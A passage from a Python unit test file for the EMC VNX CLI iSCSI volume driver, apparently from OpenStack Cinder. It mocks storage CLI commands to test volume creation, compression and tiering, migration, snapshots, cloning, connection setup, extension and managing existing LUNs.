self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest'),
self.testData.LUN_PROPERTY_ALL_CMD('vol-vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('snapshot1'),
self.testData.POOL_PROPERTY_CMD]
standard_results = [
self.testData.LUN_PROPERTY('vol1'),
self.testData.LUN_PROPERTY('vol2'),
self.testData.LUN_PROPERTY('vol2_dest'),
self.testData.LUN_PROPERTY('vol-vol1'),
self.testData.LUN_PROPERTY('snapshot1'),
self.testData.POOL_PROPERTY]
standard_default = SUCCEED
for i in range(len(standard_commands)):
if args == standard_commands[i]:
return standard_results[i]
return standard_default
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_destroy_volume_without_extra_spec(self):
fake_cli = self.driverSetup()
self.driver.create_volume(self.testData.test_volume)
self.driver.delete_volume(self.testData.test_volume)
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1', 1,
'unit_test_pool',
'thick', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.LUN_DELETE_CMD('vol1'))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_compressed(self):
extra_specs = {'storagetype:provisioning': 'compressed'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'compressed', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(
1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_compressed_tiering_highestavailable(self):
extra_specs = {'storagetype:provisioning': 'compressed',
'storagetype:tiering': 'HighestAvailable'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'compressed', 'highestavailable')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(
1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_deduplicated(self):
extra_specs = {'storagetype:provisioning': 'deduplicated'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'deduplicated', None))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_volume_tiering_auto(self):
extra_specs = {'storagetype:tiering': 'Auto'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
None, 'auto'))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_deduplicated_tiering_auto(self):
extra_specs = {'storagetype:tiering': 'Auto',
'storagetype:provisioning': 'Deduplicated'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
self.driverSetup(commands, results)
ex = self.assertRaises(
exception.VolumeBackendAPIException,
self.driver.create_volume,
self.testData.test_volume_with_type)
self.assertTrue(
re.match(r".*deduplicated and auto tiering can't be both enabled",
ex.msg))
def test_create_volume_compressed_no_enabler(self):
extra_specs = {'storagetype:provisioning': 'Compressed'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
('No package', 0)]
self.driverSetup(commands, results)
ex = self.assertRaises(
exception.VolumeBackendAPIException,
self.driver.create_volume,
self.testData.test_volume_with_type)
self.assertTrue(
re.match(r".*Compression Enabler is not installed",
ex.msg))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_create_compression_volume_on_array_backend(self):
"""Unit test for create a compression volume on array
backend.
"""
#Set up the array backend
config = conf.Configuration(None)
config.append_config_values = mock.Mock(return_value=0)
config.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
config.san_ip = '10.0.0.1'
config.san_login = 'sysadmin'
config.san_password = 'sysadmin'
config.default_timeout = 0.0002
config.initiator_auto_registration = True
config.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
config.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
self.driver = EMCCLIISCSIDriver(configuration=config)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliArray)
extra_specs = {'storagetype:provisioning': 'Compressed',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
self.testData.NDU_LIST_RESULT]
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
self.driver.cli.stats['compression_support'] = 'True'
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
#case
self.driver.create_volume(self.testData.test_volume_with_type)
#verification
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol_with_type', 1,
'unit_test_pool',
'compressed', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol_with_type')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(
1))]
fake_cli.assert_has_calls(expect_cmd)
def test_get_volume_stats(self):
#expect_result = [POOL_PROPERTY]
self.driverSetup()
stats = self.driver.get_volume_stats(True)
self.assertTrue(stats['driver_version'] is not None,
"dirver_version is not returned")
self.assertTrue(
stats['free_capacity_gb'] == 1000.6,
"free_capacity_gb is not correct")
self.assertTrue(
stats['reserved_percentage'] == 0,
"reserved_percentage is not correct")
self.assertTrue(
stats['storage_protocol'] == 'iSCSI',
"storage_protocol is not correct")
self.assertTrue(
stats['total_capacity_gb'] == 10000.5,
"total_capacity_gb is not correct")
self.assertTrue(
stats['vendor_name'] == "EMC",
"vender name is not correct")
self.assertTrue(
stats['volume_backend_name'] == "namedbackend",
"volume backend name is not correct")
self.assertTrue(stats['location_info'] == "unit_test_pool|fakeSerial")
self.assertTrue(
stats['driver_version'] == "04.01.00",
"driver version is incorrect.")
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(
side_effect=[1, 1]))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
def test_volume_migration_timeout(self):
commands = [self.testData.MIGRATION_CMD(),
self.testData.MIGRATION_VERIFY_CMD(1)]
FAKE_ERROR_MSG = """\
A network error occurred while trying to connect: '10.244.213.142'.
Message : Error occurred because connection refused. \
Unable to establish a secure connection to the Management Server.
"""
FAKE_ERROR_MSG = FAKE_ERROR_MSG.replace('\n', ' ')
FAKE_MIGRATE_PROPERTY = """\
Source LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d
Source LU ID: 63950
Dest LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d_dest
Dest LU ID: 136
Migration Rate: high
Current State: MIGRATED
Percent Complete: 100
Time Remaining: 0 second(s)
"""
results = [(FAKE_ERROR_MSG, 255),
[SUCCEED,
(FAKE_MIGRATE_PROPERTY, 0),
('The specified source LUN is not currently migrating',
23)]]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume,
fakehost)[0]
self.assertTrue(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(
return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(
side_effect=[1, 1]))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
def test_volume_migration(self):
commands = [self.testData.MIGRATION_CMD(),
self.testData.MIGRATION_VERIFY_CMD(1)]
FAKE_MIGRATE_PROPERTY = """\
Source LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d
Source LU ID: 63950
Dest LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d_dest
Dest LU ID: 136
Migration Rate: high
Current State: MIGRATED
Percent Complete: 100
Time Remaining: 0 second(s)
"""
results = [SUCCEED, [(FAKE_MIGRATE_PROPERTY, 0),
('The specified source LUN is not '
'currently migrating',
23)]]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume,
fakehost)[0]
self.assertTrue(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(
return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=5))
def test_volume_migration_02(self):
commands = [self.testData.MIGRATION_CMD(5, 5),
self.testData.MIGRATION_VERIFY_CMD(5)]
FAKE_MIGRATE_PROPERTY = """\
Source LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d
Source LU ID: 63950
Dest LU Name: volume-f6247ae1-8e1c-4927-aa7e-7f8e272e5c3d_dest
Dest LU ID: 136
Migration Rate: high
Current State: MIGRATED
Percent Complete: 100
Time Remaining: 0 second(s)
"""
results = [SUCCEED, [(FAKE_MIGRATE_PROPERTY, 0),
('The specified source LUN is not '
'currently migrating',
23)]]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume5,
fakehost)[0]
self.assertTrue(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(5, 5),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(5)),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(5))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch("cinder.volume.drivers.emc.emc_vnx_cli."
"CommandLineHelper.create_lun_by_cmd",
mock.Mock(
return_value=True))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(
side_effect=[1, 1]))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
def test_volume_migration_failed(self):
commands = [self.testData.MIGRATION_CMD()]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
fakehost = {'capabilities': {'location_info':
"unit_test_pool2|fakeSerial",
'storage_protocol': 'iSCSI'}}
ret = self.driver.migrate_volume(None, self.testData.test_volume,
fakehost)[0]
self.assertFalse(ret)
#verification
expect_cmd = [mock.call(*self.testData.MIGRATION_CMD(),
retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
def test_create_destroy_volume_snapshot(self):
fake_cli = self.driverSetup()
#case
self.driver.create_snapshot(self.testData.test_snapshot)
self.driver.delete_snapshot(self.testData.test_snapshot)
#verification
expect_cmd = [mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.SNAP_CREATE_CMD('snapshot1')),
mock.call(*self.testData.SNAP_DELETE_CMD('snapshot1'))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"oslo_concurrency.processutils.execute",
mock.Mock(
return_value=(
"fakeportal iqn.1992-04.fake.com:fake.apm00123907237.a8", 0)))
@mock.patch("random.shuffle", mock.Mock())
def test_initialize_connection(self):
# Test for auto registration
self.configuration.initiator_auto_registration = True
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
self.testData.GETPORT_CMD(),
self.testData.PINGNODE_CMD('A', 4, 0, '10.0.0.2')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.ALL_PORTS,
self.testData.PING_OK]
fake_cli = self.driverSetup(commands, results)
connection_info = self.driver.initialize_connection(
self.testData.test_volume,
self.testData.connector)
self.assertEqual(connection_info,
self.testData.iscsi_connection_info_ro)
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-list'),
mock.call(*self.testData.GETPORT_CMD()),
mock.call('storagegroup', '-gname', 'fakehost', '-setpath',
'-hbauid', 'iqn.1993-08.org.debian:01:222',
'-sp', 'A', '-spport', 4, '-spvport', 0,
'-ip', '10.0.0.2', '-host', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call(*self.testData.GETPORT_CMD()),
mock.call(*self.testData.PINGNODE_CMD('A', 4, 0,
'10.0.0.2'))]
fake_cli.assert_has_calls(expected)
# Test for manaul registration
self.configuration.initiator_auto_registration = False
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
self.testData.CONNECTHOST_CMD('fakehost', 'fakehost'),
self.testData.GETPORT_CMD(),
self.testData.PINGNODE_CMD('A', 4, 0, '10.0.0.2')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
('', 0),
self.testData.ALL_PORTS,
self.testData.PING_OK]
fake_cli = self.driverSetup(commands, results)
connection_info = self.driver.initialize_connection(
self.testData.test_volume_rw,
self.testData.connector)
self.assertEqual(connection_info,
self.testData.iscsi_connection_info_rw)
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-connecthost',
'-host', 'fakehost', '-gname', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('connection', '-getport', '-address', '-vlanid')]
fake_cli.assert_has_calls(expected)
def test_terminate_connection(self):
os.path.exists = mock.Mock(return_value=1)
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
cli_helper = self.driver.cli._client
data = {'storage_group_name': "fakehost",
'storage_group_uid': "2F:D4:00:00:00:00:00:"
"00:00:00:FF:E5:3A:03:FD:6D",
'lunmap': {1: 16, 2: 88, 3: 47}}
cli_helper.get_storage_group = mock.Mock(
return_value=data)
lun_info = {'lun_name': "unit_test_lun",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.remove_hlu_from_storagegroup = mock.Mock()
self.driver.terminate_connection(self.testData.test_volume,
self.testData.connector)
cli_helper.remove_hlu_from_storagegroup.assert_called_once_with(
16, self.testData.connector["host"])
# expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
# mock.call('lun', '-list', '-name', 'vol1'),
# mock.call('storagegroup', '-list', '-gname', 'fakehost'),
# mock.call('lun', '-list', '-l', '10', '-owner')]
def test_create_volume_cli_failed(self):
commands = [self.testData.LUN_CREATION_CMD(
'failed_vol1', 1, 'unit_test_pool', None, None)]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(EMCVnxCLICmdError,
self.driver.create_volume,
self.testData.test_failed_volume)
expect_cmd = [mock.call(*self.testData.LUN_CREATION_CMD(
'failed_vol1', 1, 'unit_test_pool', None, None))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_snapshot_failed(self):
commands = [self.testData.SNAP_CREATE_CMD('failed_snapshot')]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
#case
self.assertRaises(EMCVnxCLICmdError,
self.driver.create_snapshot,
self.testData.test_failed_snapshot)
#verification
expect_cmd = [
mock.call(
*self.testData.LUN_PROPERTY_ALL_CMD(
'vol-vol1')),
mock.call(
*self.testData.SNAP_CREATE_CMD(
'failed_snapshot'))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_from_snapshot(self):
#set up
cmd_smp = ('lun', '-list', '-name', 'vol2', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol2
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol2_dest")
output_dest = self.testData.LUN_PROPERTY("vol2_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate, cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.driver.create_volume_from_snapshot(self.testData.test_volume2,
self.testData.test_snapshot)
expect_cmd = [
mock.call(
*self.testData.SNAP_MP_CREATE_CMD(
name='vol2', source='vol1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol2', snapName='snapshot1')),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol2_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol2', '-attachedSnapshot')]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_from_snapshot_sync_failed(self):
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol1
Attached Snapshot: fakesnap""", 0)
cmd_smp = ('lun', '-list', '-name', 'vol2', '-attachedSnapshot')
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol2_dest")
output_dest = self.testData.LUN_PROPERTY("vol2_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate, cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.testData.test_volume2,
self.testData.test_snapshot)
expect_cmd = [
mock.call(
*self.testData.SNAP_MP_CREATE_CMD(
name='vol2', source='vol1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol2', snapName='snapshot1')),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol2_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_cloned_volume(self):
cmd_smp = ('lun', '-list', '-name', 'vol1', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol1
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol1_dest")
output_dest = self.testData.LUN_PROPERTY("vol1_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate,
cmd_migrate_verify,
self.testData.NDU_LIST_CMD]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify,
self.testData.NDU_LIST_RESULT]
fake_cli = self.driverSetup(commands, results)
self.driver.create_cloned_volume(self.testData.test_volume,
self.testData.test_snapshot)
tmp_snap = 'tmp-snap-' + self.testData.test_volume['id']
expect_cmd = [
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('snapshot1')),
mock.call(
*self.testData.SNAP_CREATE_CMD(tmp_snap)),
mock.call(*self.testData.SNAP_MP_CREATE_CMD(name='vol1',
source='snapshot1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol1', snapName=tmp_snap)),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol1', '-attachedSnapshot'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.SNAP_DELETE_CMD(tmp_snap))]
fake_cli.assert_has_calls(expect_cmd)
def test_delete_volume_failed(self):
commands = [self.testData.LUN_DELETE_CMD('failed_vol1')]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(EMCVnxCLICmdError,
self.driver.delete_volume,
self.testData.test_failed_volume)
expected = [mock.call(*self.testData.LUN_DELETE_CMD('failed_vol1'))]
fake_cli.assert_has_calls(expected)
def test_extend_volume(self):
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol1')]
results = [self.testData.LUN_PROPERTY('vol1', size=2)]
fake_cli = self.driverSetup(commands, results)
# case
self.driver.extend_volume(self.testData.test_volume, 2)
expected = [mock.call(*self.testData.LUN_EXTEND_CMD('vol1', 2)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol1'))]
fake_cli.assert_has_calls(expected)
def test_extend_volume_has_snapshot(self):
commands = [self.testData.LUN_EXTEND_CMD('failed_vol1', 2)]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(EMCVnxCLICmdError,
self.driver.extend_volume,
self.testData.test_failed_volume,
2)
expected = [mock.call(*self.testData.LUN_EXTEND_CMD('failed_vol1', 2))]
fake_cli.assert_has_calls(expected)
def test_extend_volume_failed(self):
commands = [self.testData.LUN_PROPERTY_ALL_CMD('failed_vol1')]
results = [self.testData.LUN_PROPERTY('failed_vol1', size=2)]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.testData.test_failed_volume,
3)
expected = [
mock.call(
*self.testData.LUN_EXTEND_CMD('failed_vol1', 3)),
mock.call(
*self.testData.LUN_PROPERTY_ALL_CMD('failed_vol1'))]
fake_cli.assert_has_calls(expected)
def test_create_remove_export(self):
fake_cli = self.driverSetup()
self.driver.create_export(None, self.testData.test_volume)
self.driver.remove_export(None, self.testData.test_volume)
expected = [mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1'))]
fake_cli.assert_has_calls(expected)
def test_manage_existing(self):
"""Unit test for the manage_existing function
of driver
"""
get_lun_cmd = ('lun', '-list', '-l', self.testData.test_lun_id,
'-state', '-userCap', '-owner',
'-attachedSnapshot', '-poolName')
lun_rename_cmd = ('lun', '-modify', '-l', self.testData.test_lun_id,
'-newName', 'vol_with_type', '-o')
commands = [get_lun_cmd, lun_rename_cmd]
results = [self.testData.LUN_PROPERTY('lun_name'), SUCCEED]
self.configuration.storage_vnx_pool_name = \
self.testData.test_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
self.driver.manage_existing(
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
expected = [mock.call(*get_lun_cmd),
mock.call(*lun_rename_cmd)]
fake_cli.assert_has_calls(expected)
def test_manage_existing_lun_in_another_pool(self):
"""Unit test for the manage_existing function
of driver with a invalid pool backend.
An exception would occur in this case
"""
get_lun_cmd = ('lun', '-list', '-l', self.testData.test_lun_id,
'-state', '-userCap', '-owner',
'-attachedSnapshot', '-poolName')
commands = [get_lun_cmd]
results = [self.testData.LUN_PROPERTY('lun_name')]
invalid_pool_name = "fake_pool"
self.configuration.storage_vnx_pool_name = invalid_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
ex = self.assertRaises(
exception.ManageExistingInvalidReference,
self.driver.manage_existing,
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
self.assertTrue(
re.match(r'.*not in a manageable pool backend by cinder',
ex.msg))
